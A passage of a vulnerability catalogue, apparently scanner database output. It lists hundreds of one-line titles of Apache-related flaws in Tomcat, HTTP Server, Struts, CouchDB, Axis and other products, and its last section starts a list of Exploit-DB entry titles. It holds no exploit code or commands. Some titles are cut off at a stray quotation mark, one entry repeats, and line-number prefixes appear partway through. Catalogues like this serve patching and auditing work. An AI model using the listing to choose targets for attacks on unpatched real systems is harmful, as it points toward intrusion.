| [82338] Apache Tomcat log/logdir information disclosure
| [82328] Apache Maven and Apache Maven Wagon SSL spoofing
| [82268] Apache OpenJPA deserialization command execution
| [81981] Apache CXF UsernameTokens security bypass
| [81980] Apache CXF WS-Security security bypass
| [81398] Apache OFBiz cross-site scripting
| [81240] Apache CouchDB directory traversal
| [81226] Apache CouchDB JSONP code execution
| [81225] Apache CouchDB Futon user interface cross-site scripting
| [81211] Apache Axis2/C SSL spoofing
| [81167] Apache CloudStack DeployVM information disclosure
| [81166] Apache CloudStack AddHost API information disclosure
| [81165] Apache CloudStack createSSHKeyPair API information disclosure
| [80518] Apache Tomcat cross-site request forgery security bypass
| [80517] Apache Tomcat FormAuthenticator security bypass
| [80516] Apache Tomcat NIO denial of service
| [80408] Apache Tomcat replay-countermeasure security bypass
| [80407] Apache Tomcat HTTP Digest Access Authentication security bypass
| [80317] Apache Tomcat slowloris denial of service
| [79984] Apache Commons HttpClient SSL spoofing
| [79983] Apache CXF SSL spoofing
| [79830] Apache Axis2/Java SSL spoofing
| [79829] Apache Axis SSL spoofing
| [79809] Apache Tomcat DIGEST security bypass
| [79806] Apache Tomcat parseHeaders() denial of service
| [79540] Apache OFBiz unspecified
| [79487] Apache Axis2 SAML security bypass
| [79212] Apache Cloudstack code execution
| [78734] Apache CXF SOAP Action security bypass
| [78730] Apache Qpid broker denial of service
| [78617] Eucalyptus Apache Santuario (XML Security for Java) denial of service
| [78563] Apache mod_pagespeed module unspecified cross-site scripting
| [78562] Apache mod_pagespeed module security bypass
| [78454] Apache Axis2 security bypass
| [78452] Websense Web Security and Web Filter Apache Tomcat information disclosure
| [78451] Websense Web Security and Web Filter Apache Tomcat cross-site scripting
| [78321] Apache Wicket unspecified cross-site scripting
| [78183] Apache Struts parameters denial of service
| [78182] Apache Struts cross-site request forgery
| [78153] Apache Solr Autocomplete module for Drupal autocomplete results cross-site scripting
| [77987] mod_rpaf module for Apache denial of service
| [77958] Apache Struts skill name code execution
| [77914] Apache HTTP Server mod_negotiation module cross-site scripting
| [77913] Apache HTTP Server mod_proxy_ajp information disclosure
| [77568] Apache Qpid broker security bypass
| [77421] Apache Libcloud spoofing
| [77059] Oracle Solaris Cluster Apache Tomcat Agent unspecified
| [77046] Oracle Solaris Apache HTTP Server information disclosure
| [76837] Apache Hadoop information disclosure
| [76802] Apache Sling CopyFrom denial of service
| [76692] Apache Hadoop symlink
| [76535] Apache Roller console cross-site request forgery
| [76534] Apache Roller weblog cross-site scripting
| [76152] Apache CXF elements security bypass
| [76151] Apache CXF child policies security bypass
| [75983] MapServer for Windows Apache file include
| [75857] Apache Commons Compress and Apache Ant bzip2 denial of service
| [75558] Apache POI denial of service
| [75545] PHP apache_request_headers() buffer overflow
| [75302] Apache Qpid SASL security bypass
| [75211] Debian GNU/Linux apache 2 cross-site scripting
| [74901] Apache HTTP Server LD_LIBRARY_PATH privilege escalation
| [74871] Apache OFBiz FlexibleStringExpander code execution
| [74870] Apache OFBiz multiple cross-site scripting
| [74750] Apache Hadoop unspecified spoofing
| [74319] Apache Struts XSLTResult.java file upload
| [74313] Apache Traffic Server header buffer overflow
| [74276] Apache Wicket directory traversal
| [74273] Apache Wicket unspecified cross-site scripting
| [74181] Apache HTTP Server mod_fcgid module denial of service
| [73690] Apache Struts OGNL code execution
| [73432] Apache Solr extension for TYPO3 unspecified cross-site scripting
| [73100] Apache MyFaces in directory traversal
| [73096] Apache APR hash denial of service
| [73052] Apache Struts name cross-site scripting
| [73030] Apache CXF UsernameToken security bypass
| [72888] Apache Struts lastName cross-site scripting
| [72758] Apache HTTP Server httpOnly information disclosure
| [72757] Apache HTTP Server MPM denial of service
| [72585] Apache Struts ParameterInterceptor security bypass
| [72438] Apache Tomcat Digest security bypass
| [72437] Apache Tomcat Digest security bypass
| [72436] Apache Tomcat DIGEST security bypass
| [72425] Apache Tomcat parameter denial of service
| [72422] Apache Tomcat request object information disclosure
| [72377] Apache HTTP Server scoreboard security bypass
| [72345] Apache HTTP Server HTTP request denial of service
| [72229] Apache Struts ExceptionDelegator command execution
| [72089] Apache Struts ParameterInterceptor directory traversal
| [72088] Apache Struts CookieInterceptor command execution
| [72047] Apache Geronimo hash denial of service
| [72016] Apache Tomcat hash denial of service
| [71711] Apache Struts OGNL expression code execution
| [71654] Apache Struts interfaces security bypass
| [71620] Apache ActiveMQ failover denial of service
| [71617] Apache HTTP Server mod_proxy module information disclosure
| [71508] Apache MyFaces EL security bypass
| [71445] Apache HTTP Server mod_proxy security bypass
| [71203] Apache Tomcat servlets privilege escalation
| [71181] Apache HTTP Server ap_pregsub() denial of service
| [71093] Apache HTTP Server ap_pregsub() buffer overflow
| [70336] Apache HTTP Server mod_proxy information disclosure
| [69804] Apache HTTP Server mod_proxy_ajp denial of service
| [69472] Apache Tomcat AJP security bypass
| [69396] Apache HTTP Server ByteRange filter denial of service
| [69394] Apache Wicket multi window support cross-site scripting
| [69176] Apache Tomcat XML information disclosure
| [69161] Apache Tomcat jsvc information disclosure
| [68799] mod_authnz_external module for Apache mysql-auth.pl SQL injection
| [68541] Apache Tomcat sendfile information disclosure
| [68420] Apache XML Security denial of service
| [68238] Apache Tomcat JMX information disclosure
| [67860] Apache Rampart/C rampart_timestamp_token_validate security bypass
| [67804] Apache Subversion control rules information disclosure
| [67803] Apache Subversion control rules denial of service
| [67802] Apache Subversion baselined denial of service
| [67672] Apache Archiva multiple cross-site scripting
| [67671] Apache Archiva multiple cross-site request forgery
| [67564] Apache APR apr_fnmatch() denial of service
| [67532] IBM WebSphere Application Server org.apache.jasper.runtime.JspWriterImpl.response denial of service
| [67515] Apache Tomcat annotations security bypass
| [67480] Apache Struts s:submit information disclosure
| [67414] Apache APR apr_fnmatch() denial of service
| [67356] Apache Struts javatemplates cross-site scripting
| [67354] Apache Struts Xwork cross-site scripting
| [66676] Apache Tomcat HTTP BIO information disclosure
| [66675] Apache Tomcat web.xml security bypass
| [66640] Apache HttpComponents HttpClient Proxy-Authorization information disclosure
| [66241] Apache HttpComponents information disclosure
| [66154] Apache Tomcat ServletSecurity security bypass
| [65971] Apache Tomcat ServletSecurity security bypass
| [65876] Apache Subversion mod_dav_svn denial of service
| [65343] Apache Continuum unspecified cross-site scripting
| [65162] Apache Tomcat NIO connector denial of service
| [65161] Apache Tomcat javax.servlet.ServletRequest.getLocale() denial of service
| [65160] Apache Tomcat HTML Manager interface cross-site scripting
| [65159] Apache Tomcat ServletContect security bypass
| [65050] Apache CouchDB web-based administration UI cross-site scripting
| [64773] Oracle HTTP Server Apache Plugin unauthorized access
| [64473] Apache Subversion blame -g denial of service
| [64472] Apache Subversion walk() denial of service
| [64407] Apache Axis2 CVE-2010-0219 code execution
| [63926] Apache Archiva password privilege escalation
| [63785] Apache CouchDB LD_LIBRARY_PATH privilege escalation
| [63493] Apache Archiva credentials cross-site request forgery
| [63477] Apache Tomcat HttpOnly session hijacking
| [63422] Apache Tomcat sessionsList.jsp cross-site scripting
| [63303] Apache mod_fcgid module fcgid_header_bucket_read() buffer overflow
| [62959] Apache Shiro filters security bypass
| [62790] Apache Perl cgi module denial of service
| [62576] Apache Qpid exchange denial of service
| [62575] Apache Qpid AMQP denial of service
| [62354] Apache Qpid SSL denial of service
| [62235] Apache APR-util apr_brigade_split_line() denial of service
| [62181] Apache XML-RPC SAX Parser information disclosure
| [61721] Apache Traffic Server cache poisoning
| [61202] Apache Derby BUILTIN authentication functionality information disclosure
| [61186] Apache CouchDB Futon cross-site request forgery
| [61169] Apache CXF DTD denial of service
| [61070] Apache Jackrabbit search.jsp SQL injection
| [61006] Apache SLMS Quoting cross-site request forgery
| [60962] Apache Tomcat time cross-site scripting
| [60883] Apache mod_proxy_http information disclosure
| [60671] Apache HTTP Server mod_cache and mod_dav denial of service
| [60264] Apache Tomcat Transfer-Encoding denial of service
| [59746] Apache Axis2 axis2/axis2-admin page session hijacking
| [59588] Apache Axis2/Java XML DTD (Document Type Declaration) data denial of service
| [59413] Apache mod_proxy_http timeout information disclosure
| [59058] Apache MyFaces unencrypted view state cross-site scripting
| [58827] Apache Axis2 xsd file include
| [58790] Apache Axis2 modules cross-site scripting
| [58299] Apache ActiveMQ queueBrowse cross-site scripting
| [58169] Apache Tomcat Web Application Manager / Host Manager cross-site request forgery
| [58056] Apache ActiveMQ .jsp source code disclosure
| [58055] Apache Tomcat realm name information disclosure
| [58046] Apache HTTP Server mod_auth_shadow security bypass
| [57841] Apache Open For Business Project (OFBiz) subject cross-site scripting
| [57840] Apache Open For Business Project (OFBiz) multiple parameters cross-site scripting
| [57429] Apache CouchDB algorithms information disclosure
| [57398] Apache ActiveMQ Web console cross-site request forgery
| [57397] Apache ActiveMQ createDestination.action cross-site scripting
| [56653] Apache HTTP Server DNS spoofing
| [56652] Apache HTTP Server DNS cross-site scripting
| [56625] Apache HTTP Server request header information disclosure
| [56624] Apache HTTP Server mod_isapi orphaned callback pointer code execution
| [56623] Apache HTTP Server mod_proxy_ajp denial of service
| [55941] mod_proxy module for Apache ap_proxy_send_fb() buffer overflow
| [55857] Apache Tomcat WAR files directory traversal
| [55856] Apache Tomcat autoDeploy attribute security bypass
| [55855] Apache Tomcat WAR directory traversal
| [55210] Intuit component for Joomla! Apache information disclosure
| [54533] Apache Tomcat 404 error page cross-site scripting
| [54182] Apache Tomcat admin default password
| [53878] Apache Solr Search (solr) extension for TYPO3 unspecified cross-site scripting
| [53666] Apache HTTP Server Solaris pollset support denial of service
| [53650] Apache HTTP Server HTTP basic-auth module security bypass
| [53124] mod_proxy_ftp module for Apache HTTP header security bypass
| [53041] mod_proxy_ftp module for Apache denial of service
| [52540] Apache Portable Runtime and Apache Portable Utility library multiple buffer overflow
| [51953] Apache Tomcat Path Disclosure
| [51952] Apache Tomcat Path Traversal
| [51951] Apache stronghold-status Information Disclosure
| [51950] Apache stronghold-info Information Disclosure
| [51949] Apache PHP Source Code Disclosure
| [51948] Apache Multiviews Attack
| [51946] Apache JServ Environment Status Information Disclosure
| [51945] Apache error_log Information Disclosure
| [51944] Apache Default Installation Page Pattern Found
| [51943] Apache AXIS XML Parser echoheaders.jws Sample Web Service Denial of Service
| [51942] Apache AXIS XML External Entity File Retrieval
| [51941] Apache AXIS Sample Servlet Information Leak
| [51940] Apache access_log Information Disclosure
| [51626] Apache mod_deflate denial of service
| [51532] mod_proxy module for the Apache HTTP Server stream_reqbody_cl denial of service
| [51365] Apache Tomcat RequestDispatcher security bypass
| [51273] Apache HTTP Server Incomplete Request denial of service
| [51195] Apache Tomcat XML information disclosure
| [50994] Apache APR-util xml/apr_xml.c denial of service
| [50993] Apache APR-util apr_brigade_vprintf denial of service
| [50964] Apache APR-util apr_strmatch_precompile() denial of service
| [50930] Apache Tomcat j_security_check information disclosure
| [50928] Apache Tomcat AJP denial of service
| [50884] Apache HTTP Server XML ENTITY denial of service
| [50808] Apache HTTP Server AllowOverride privilege escalation
| [50108] Apache Struts s:a tag and s:url tag cross-site scripting
| [50059] Apache mod_proxy_ajp information disclosure
| [49951] Apache Tiles Expression Language (EL) expressions cross-site scripting
| [49925] Apache Geronimo Web Administrative Console cross-site request forgery
| [49924] Apache Geronimo console/portal/Server/Monitoring cross-site scripting
| [49921] Apache ActiveMQ Web interface cross-site scripting
| [49898] Apache Geronimo Services/Repository directory traversal
| [49725] Apache Tomcat mod_jk module information disclosure
| [49715] Apache mod_perl Apache::Status and Apache2::Status modules cross-site scripting
| [49712] Apache Struts unspecified cross-site scripting
| [49213] Apache Tomcat cal2.jsp cross-site scripting
| [48934] Apache Tomcat POST doRead method information disclosure
| [48211] Apache Tomcat header HTTP request smuggling
| [48163] libapache2-mod-auth-mysql module for Debian multibyte encoding SQL injection
| [48110] Apache Jackrabbit search.jsp and swr.jsp cross-site scripting
| [47709] Apache Roller "
| [47104] Novell Netware ApacheAdmin console security bypass
| [47086] Apache HTTP Server OS fingerprinting unspecified
| [46329] Apache Struts FilterDispatcher and DefaultStaticContentLoader class directory traversal
| [45791] Apache Tomcat RemoteFilterValve security bypass
| [44435] Oracle WebLogic Apache Connector buffer overflow
| [44411] Apache Tomcat allowLinking UTF-8 directory traversal
| [44223] Apache HTTP Server mod_proxy_ftp cross-site scripting
| [44156] Apache Tomcat RequestDispatcher directory traversal
| [44155] Apache Tomcat HttpServletResponse.sendError() cross-site scripting
| [43885] Oracle WebLogic Server Apache Connector buffer overflow
| [42987] Apache HTTP Server mod_proxy module denial of service
| [42915] Apache Tomcat JSP files path disclosure
| [42914] Apache Tomcat MS-DOS path disclosure
| [42892] Apache Tomcat unspecified unauthorized access
| [42816] Apache Tomcat Host Manager cross-site scripting
| [42303] Apache 403 error cross-site scripting
| [41618] Apache-SSL ExpandCert() authentication bypass
| [40761] Apache Derby RDBNAM parameter and DatabaseMetaData.getURL information disclosure
| [40736] Apache Tomcat HTTP/1.1 connector information disclosure
| [40614] Apache mod_jk2 HTTP Host header buffer overflow
| [40562] Apache Geronimo init information disclosure
| [40478] Novell Web Manager webadmin-apache.conf security bypass
| [40411] Apache Tomcat exception handling information disclosure
| [40409] Apache Tomcat native (APR based) connector weak security
| [40403] Apache Tomcat quotes and %5C cookie information disclosure
| [40388] Sun Java Plug-In org.apache.crimson.tree.XmlDocument security bypass
| [39893] Apache HTTP Server mod_negotiation HTTP response splitting
| [39867] Apache HTTP Server mod_negotiation cross-site scripting
| [39804] Apache Tomcat SingleSignOn information disclosure
| [39615] Apache HTTP Server mod_proxy_ftp.c UTF-7 cross-site scripting
| [39612] Apache HTTP Server mod_proxy_balancer buffer overflow
| [39608] Apache HTTP Server balancer manager cross-site request forgery
| [39476] Apache mod_proxy_balancer balancer_handler function denial of service
| [39474] Apache HTTP Server mod_proxy_balancer cross-site scripting
| [39472] Apache HTTP Server mod_status cross-site scripting
| [39201] Apache Tomcat JULI logging weak security
| [39158] Apache HTTP Server Windows SMB shares information disclosure
| [39001] Apache HTTP Server mod_imap and mod_imagemap module cross-site scripting
| [38951] Apache::AuthCAS Perl module cookie SQL injection
| [38800] Apache HTTP Server 413 error page cross-site scripting
| [38211] Apache Geronimo SQLLoginModule authentication bypass
| [37243] Apache Tomcat WebDAV directory traversal
| [37178] RHSA update for Apache HTTP Server mod_status module cross-site scripting not installed
| [37177] RHSA update for Apache HTTP Server Apache child process denial of service not installed
| [37119] RHSA update for Apache mod_auth_kerb off-by-one buffer overflow not installed
| [37100] RHSA update for Apache and IBM HTTP Server Expect header cross-site scripting not installed
| [36782] Apache Geronimo MEJB unauthorized access
| [36586] Apache HTTP Server UTF-7 cross-site scripting
| [36468] Apache Geronimo LoginModule security bypass
| [36467] Apache Tomcat functions.jsp cross-site scripting
| [36402] Apache Tomcat calendar cross-site request forgery
| [36354] Apache HTTP Server mod_proxy module denial of service
| [36352] Apache HTTP Server ap_proxy_date_canon() denial of service
| [36336] Apache Derby lock table privilege escalation
| [36335] Apache Derby schema privilege escalation
| [36006] Apache Tomcat "
| [36001] Apache Tomcat Host Manager Servlet alias cross-site scripting
| [35999] Apache Tomcat \"
| [35795] Apache Tomcat CookieExample cross-site scripting
| [35536] Apache Tomcat SendMailServlet example cross-site scripting
| [35384] Apache HTTP Server mod_cache module denial of service
| [35097] Apache HTTP Server mod_status module cross-site scripting
| [35095] Apache HTTP Server Prefork MPM module denial of service
| [34984] Apache HTTP Server recall_headers information disclosure
| [34966] Apache HTTP Server MPM content spoofing
| [34965] Apache HTTP Server MPM information disclosure
| [34963] Apache HTTP Server MPM multiple denial of service
| [34872] Apache MyFaces Tomahawk autoscroll parameter cross-site scripting
| [34869] Apache Tomcat JSP example Web application cross-site scripting
| [34868] Apache Tomcat Manager and Host Manager cross-site scripting
| [34496] Apache Tomcat JK Connector security bypass
| [34377] Apache Tomcat hello.jsp cross-site scripting
| [34212] Apache Tomcat SSL configuration security bypass
| [34210] Apache Tomcat Accept-Language cross-site scripting
| [34209] Apache Tomcat calendar application cross-site scripting
| [34207] Apache Tomcat implicit-objects.jsp cross-site scripting
| [34167] Apache Axis WSDL file path disclosure
| [34068] Apache Tomcat AJP connector information disclosure
| [33584] Apache HTTP Server suEXEC privilege escalation
| [32988] Apache Tomcat proxy module directory traversal
| [32794] Apache Tomcat JK Web Server Connector map_uri_to_worker() buffer overflow
| [32708] Debian Apache tty privilege escalation
| [32441] ApacheStats extract() PHP call unspecified
| [32128] Apache Tomcat default account
| [31680] Apache Tomcat RequestParamExample cross-site scripting
| [31649] Apache Tomcat Sample Servlet TroubleShooter detected
| [31557] BEA WebLogic Server and WebLogic Express Apache proxy plug-in denial of service
| [31236] Apache HTTP Server htpasswd.c strcpy buffer overflow
| [30456] Apache mod_auth_kerb off-by-one buffer overflow
| [29550] Apache mod_tcl set_var() format string
| [28620] Apache and IBM HTTP Server Expect header cross-site scripting
| [28357] Apache HTTP Server mod_alias script source information disclosure
| [28063] Apache mod_rewrite off-by-one buffer overflow
| [27902] Apache Tomcat URL information disclosure
| [26786] Apache James SMTP server denial of service
| [25680] libapache2 /tmp/svn file upload
| [25614] Apache Struts lookupMap cross-site scripting
| [25613] Apache Struts ActionForm denial of service
| [25612] Apache Struts isCancelled() security bypass
| [24965] Apache mod_python FileSession command execution
| [24716] Apache James spooler memory leak denial of service
| [24159] Apache Geronimo Web-Access-Log Viewer cross-site scripting
| [24158] Apache Geronimo jsp-examples cross-site scripting
| [24030] Apache auth_ldap module multiple format strings
| [24008] Apache mod_ssl custom error message denial of service
| [24003] Apache mod_auth_pgsql module multiple syslog format strings
| [23612] Apache mod_imap referer field cross-site scripting
| [23173] Apache Struts error message cross-site scripting
| [22942] Apache Tomcat directory listing denial of service
| [22858] Apache Multi-Processing Module code allows denial of service
| [22602] RHSA-2005:582 updates for Apache httpd not installed
| [22520] Apache mod-auth-shadow "
| [22466] ApacheTop symlink
| [22109] Apache HTTP Server ssl_engine_kernel client certificate validation
| [22006] Apache HTTP Server byte-range filter denial of service
| [21567] Apache mod_ssl off-by-one buffer overflow
| [21195] Apache HTTP Server header HTTP request smuggling
| [20383] Apache HTTP Server htdigest buffer overflow
| [19681] Apache Tomcat AJP12 request denial of service
| [18993] Apache HTTP server check_forensic symlink attack
| [18790] Apache Tomcat Manager cross-site scripting
| [18349] Apache HTTP server Apple HFS+ filesystem obtain information
| [18348] Apache HTTP server Apple HFS+ filesystem .DS_Store and .ht file disclosure
| [18347] Apache HTTP server Apple Mac OS X Server mod_digest_apple module could allow an attacker to replay responses
| [17961] Apache Web server ServerTokens has not been set
| [17930] Apache HTTP Server HTTP GET request denial of service
| [17785] Apache mod_include module buffer overflow
| [17671] Apache HTTP Server SSLCipherSuite bypass restrictions
| [17473] Apache HTTP Server Satisfy directive allows access to resources
| [17413] Apache htpasswd buffer overflow
| [17384] Apache HTTP Server environment variable configuration file buffer overflow
| [17382] Apache HTTP Server IPv6 apr_util denial of service
| [17366] Apache HTTP Server mod_dav module LOCK denial of service
| [17273] Apache HTTP Server speculative mode denial of service
| [17200] Apache HTTP Server mod_ssl denial of service
| [16890] Apache HTTP Server server-info request has been detected
| [16889] Apache HTTP Server server-status request has been detected
| [16705] Apache mod_ssl format string attack
| [16524] Apache HTTP Server ap_get_mime_headers_core denial of service
| [16387] Apache HTTP Server mod_proxy Content-Length buffer overflow
| [16230] Apache HTTP Server PHP denial of service
| [16214] Apache mod_ssl ssl_util_uuencode_binary buffer overflow
| [15958] Apache HTTP Server authentication modules memory corruption
| [15547] Apache HTTP Server mod_disk_cache local information disclosure
| [15540] Apache HTTP Server socket starvation denial of service
| [15467] Novell GroupWise WebAccess using Apache Web server allows viewing of files on the server
| [15422] Apache HTTP Server mod_access information disclosure
| [15419] Apache HTTP Server mod_ssl plain HTTP request denial of service
| [15293] Apache for Cygwin "
| [15065] Apache-SSL has a default password
| [15041] Apache HTTP Server mod_digest module could allow an attacker to replay responses
| [15015] Apache httpd server httpd.conf could allow a local user to bypass restrictions
| [14751] Apache Mod_python output filter information disclosure
| [14125] Apache HTTP Server mod_userdir module information disclosure
| [14075] Apache HTTP Server mod_php file descriptor leak
| [13703] Apache HTTP Server account
| [13689] Apache HTTP Server configuration allows symlinks
| [13688] Apache HTTP Server configuration allows SSI
| [13687] Apache HTTP Server Server: header value
| [13685] Apache HTTP Server ServerTokens value
| [13684] Apache HTTP Server ServerSignature value
| [13672] Apache HTTP Server config allows directory autoindexing
| [13671] Apache HTTP Server default content
| [13670] Apache HTTP Server config file directive references outside content root
| [13668] Apache HTTP Server httpd not running in chroot environment
| [13666] Apache HTTP Server CGI directory contains possible command interpreter or compiler
| [13664] Apache HTTP Server config file contains ScriptAlias entry
| [13663] Apache HTTP Server CGI support modules loaded
| [13661] Apache HTTP Server config file contains AddHandler entry
| [13660] Apache HTTP Server 500 error page not CGI script
| [13659] Apache HTTP Server 413 error page not CGI script
| [13658] Apache HTTP Server 403 error page not CGI script
| [13657] Apache HTTP Server 401 error page not CGI script
| [13552] Apache HTTP Server mod_cgid module information disclosure
| [13550] Apache GET request directory traversal
| [13516] Apache Cocoon XMLForm and JXForm could allow execution of code
| [13499] Apache Cocoon directory traversal allows downloading of boot.ini file
| [13429] Apache Tomcat non-HTTP request denial of service
| [13400] Apache HTTP server mod_alias and mod_rewrite buffer overflow
| [13295] Apache weak password encryption
| [13254] Apache Tomcat .jsp cross-site scripting
| [13125] Apache::Gallery Inline::C could allow arbitrary code execution
| [13086] Apache Jakarta Tomcat mod_jk format string allows remote access
| [12681] Apache HTTP Server mod_proxy could allow mail relaying
| [12662] Apache HTTP Server rotatelogs denial of service
| [12554] Apache Tomcat stores password in plain text
| [12553] Apache HTTP Server redirects and subrequests denial of service
| [12552] Apache HTTP Server FTP proxy server denial of service
| [12551] Apache HTTP Server prefork MPM denial of service
| [12550] Apache HTTP Server weaker than expected encryption
| [12549] Apache HTTP Server type-map file denial of service
| [12206] Apache Tomcat /opt/tomcat directory insecure permissions
| [12102] Apache Jakarta Tomcat MS-DOS device name request denial of service
| [12091] Apache HTTP Server apr_password_validate denial of service
| [12090] Apache HTTP Server apr_psprintf code execution
| [11804] Apache HTTP Server mod_access_referer denial of service
| [11750] Apache HTTP Server could leak sensitive file descriptors
| [11730] Apache HTTP Server error log and access log terminal escape sequence injection
| [11703] Apache long slash path allows directory listing
| [11695] Apache HTTP Server LF (Line Feed) denial of service
| [11694] Apache HTTP Server filestat.c denial of service
| [11438] Apache HTTP Server MIME message boundaries information disclosure
| [11412] Apache HTTP Server error log terminal escape sequence injection
| [11196] Apache Tomcat examples and ROOT Web applications cross-site scripting
| [11195] Apache Tomcat web.xml could be used to read files
| [11194] Apache Tomcat URL appended with a null character could list directories
| [11139] Apache HTTP Server mass virtual hosting with mod_rewrite or mod_vhost_alias could allow an attacker to obtain files
| [11126] Apache HTTP Server illegal character file disclosure
| [11125] Apache HTTP Server DOS device name HTTP POST code execution
| [11124] Apache HTTP Server DOS device name denial of service
| [11088] Apache HTTP Server mod_vhost_alias CGI source disclosure
| [10938] Apache HTTP Server printenv test CGI cross-site scripting
| [10771] Apache Tomcat mod_jk module multiple HTTP GET request buffer overflow
| [10575] Apache mod_php module could allow an attacker to take over the httpd process
| [10499] Apache HTTP Server WebDAV HTTP POST view source
| [10457] Apache HTTP Server mod_ssl "
| [10415] Apache HTTP Server htdigest insecure system() call could allow command execution
| [10414] Apache HTTP Server htdigest multiple buffer overflows
| [10413] Apache HTTP Server htdigest temporary file race condition
| [10412] Apache HTTP Server htpasswd temporary file race condition
| [10376] Apache Tomcat invoker servlet used in conjunction with the default servlet reveals source code
| [10348] Apache Tomcat HTTP GET request DOS device reference could cause a denial of service
| [10281] Apache HTTP Server ab.c ApacheBench long response buffer overflow
| [10280] Apache HTTP Server shared memory scorecard overwrite
| [10263] Apache Tomcat mod_jk or mod_jserv connector directory disclosure
| [10241] Apache HTTP Server Host: header cross-site scripting
| [10230] Slapper worm variants A, B, and C target OpenSSL/Apache systems
| [10208] Apache HTTP Server mod_dav denial of service
| [10206] HP VVOS Apache mod_ssl denial of service
| [10200] Apache HTTP Server stderr denial of service
| [10175] Apache Tomcat org.apache.catalina.servlets.DefaultServlet reveals source code
| [10169] Slapper worm variant (Slapper.C) targets OpenSSL/Apache systems
| [10154] Slapper worm variant (Slapper.B) targets OpenSSL/Apache systems
| [10098] Slapper worm targets OpenSSL/Apache systems
| [9876] Apache HTTP Server cgi/cgid request could disclose the path to a requested script
| [9875] Apache HTTP Server .var file request could disclose installation path
| [9863] Apache Tomcat web.xml file could allow a remote attacker to bypass restrictions
| [9808] Apache HTTP Server non-Unix version URL encoded directory traversal
| [9623] Apache HTTP Server ap_log_rerror() path disclosure
| [9520] Apache Tomcat /servlet/ mapping cross-site scripting
| [9415] Apache HTTP Server mod_ssl .htaccess off-by-one buffer overflow
| [9396] Apache Tomcat null character to threads denial of service
| [9394] Apache Tomcat HTTP request for LPT9 reveals Web root path
| [9249] Apache HTTP Server chunked encoding heap buffer overflow
| [9208] Apache Tomcat sample file requests could reveal directory listing and path to Web root directory
| [8932] Apache Tomcat example class information disclosure
| [8633] Apache HTTP Server with mod_rewrite could allow an attacker to bypass directives
| [8629] Apache HTTP Server double-reverse DNS lookup spoofing
| [8589] Apache HTTP Server for Windows DOS batch file remote command execution
| [8457] Oracle9i Application Server Apache PL/SQL HTTP Location header buffer overflow
| [8455] Oracle9i Application Server default installation could allow an attacker to access certain Apache Services
| [8400] Apache HTTP Server mod_frontpage buffer overflows
| [8326] Apache HTTP Server multiple MIME headers (sioux) denial of service
| [8308] Apache "
| [8275] Apache HTTP Server with Multiviews enabled could disclose directory contents
| [8119] Apache and PHP OPTIONS request reveals "
| [8054] Apache is running on the system
| [8029] Mandrake Linux default Apache configuration could allow an attacker to browse files and directories
14563| [8029] Mandrake Linux default Apache configuration could allow an attacker to browse files and directories
14564| [8027] Mandrake Linux default Apache configuration has remote management interface enabled
14565| [8026] Mandrake Linux Apache sample programs could disclose sensitive information about the server
14566| [7836] Apache HTTP Server log directory denial of service
14567| [7815] Apache for Windows "
14568| [7810] Apache HTTP request could result in unexpected behavior
14569| [7599] Apache Tomcat reveals installation path
14570| [7494] Apache "
14571| [7419] Apache Web Server could allow remote attackers to overwrite .log files
14572| [7363] Apache Web Server hidden HTTP requests
14573| [7249] Apache mod_proxy denial of service
14574| [7129] Linux with Apache Web server could allow an attacker to determine if a specified username exists
14575| [7103] Apple Mac OS X used with Apache Web server could disclose directory contents
14576| [7059] Apache "
14577| [7057] Apache "
14578| [7056] Apache "
14579| [7055] Apache "
14580| [7054] Apache "
14581| [6997] Apache Jakarta Tomcat error message may reveal information
14582| [6971] Apache Jakarta Tomcat may reveal JSP source code with missing HTTP protocol specification
14583| [6970] Apache crafted HTTP request could reveal the internal IP address
14584| [6921] Apache long slash path allows directory listing
14585| [6687] Apple Mac OS X used with Apache Web server could allow arbitrary file disclosure
14586| [6527] Apache Web Server for Windows and OS2 denial of service
14587| [6316] Apache Jakarta Tomcat may reveal JSP source code
14588| [6305] Apache Jakarta Tomcat directory traversal
14589| [5926] Linux Apache symbolic link
14590| [5659] Apache Web server discloses files when used with php script
14591| [5310] Apache mod_rewrite allows attacker to view arbitrary files
14592| [5204] Apache WebDAV directory listings
14593| [5197] Apache Web server reveals CGI script source code
14594| [5160] Apache Jakarta Tomcat default installation
14595| [5099] Trustix Secure Linux installs Apache with world writable access
14596| [4968] Apache Jakarta Tomcat snoop servlet gives out information which could be used in attack
14597| [4967] Apache Jakarta Tomcat 404 error reveals the pathname of the requested file
14598| [4931] Apache source.asp example file allows users to write to files
14599| [4575] IBM HTTP Server running Apache allows users to directory listing and file retrieval
14600| [4205] Apache Jakarta Tomcat delivers file contents
14601| [2084] Apache on Debian by default serves the /usr/doc directory
14602| [1630] MessageMedia UnityMail and Apache Web server MIME header flood denial of service
14603| [697] Apache HTTP server beck exploit
14604| [331] Apache cookies buffer overflow
14605|
14606| Exploit-DB - https://www.exploit-db.com:
14607| [31130] Apache Tomcat <= 6.0.15 Cookie Quote Handling Remote Information Disclosure Vulnerability
14608| [31052] Apache <= 2.2.6 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
14609| [30901] Apache HTTP Server 2.2.6 Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
14610| [30835] Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness
14611| [30563] Apache Tomcat <= 5.5.15 Cal2.JSP Cross-Site Scripting Vulnerability
14612| [30496] Apache Tomcat <= 6.0.13 Cookie Handling Quote Delimiter Session ID Disclosure
14613| [30495] Apache Tomcat <= 6.0.13 Host Manager Servlet Cross Site Scripting Vulnerability
14614| [30191] Apache MyFaces Tomahawk JSF Framework 1.1.5 Autoscroll Parameter Cross Site Scripting Vulnerability
14615| [30189] Apache Tomcat <= 6.0.13 JSP Example Web Applications Cross Site Scripting Vulnerability
14616| [30052] Apache Tomcat 6.0.10 Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities
14617| [29930] Apache AXIS 1.0 Non-Existent WSDL Path Information Disclosure Vulnerability
14618| [29859] Apache Roller OGNL Injection
14619| [29739] Apache HTTP Server Tomcat 5.x/6.0.x Directory Traversal Vulnerability
14620| [29435] Apache Tomcat 5.5.25 - CSRF Vulnerabilities
14621| [29316] Apache + PHP 5.x - Remote Code Execution (Multithreaded Scanner) (2)
14622| [29290] Apache / PHP 5.x Remote Code Execution Exploit
14623| [28713] Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object RCE
14624| [28424] Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness
14625| [28365] Apache 2.2.2 CGI Script Source Code Information Disclosure Vulnerability
14626| [28254] Apache Tomcat 5 Information Disclosure Vulnerability
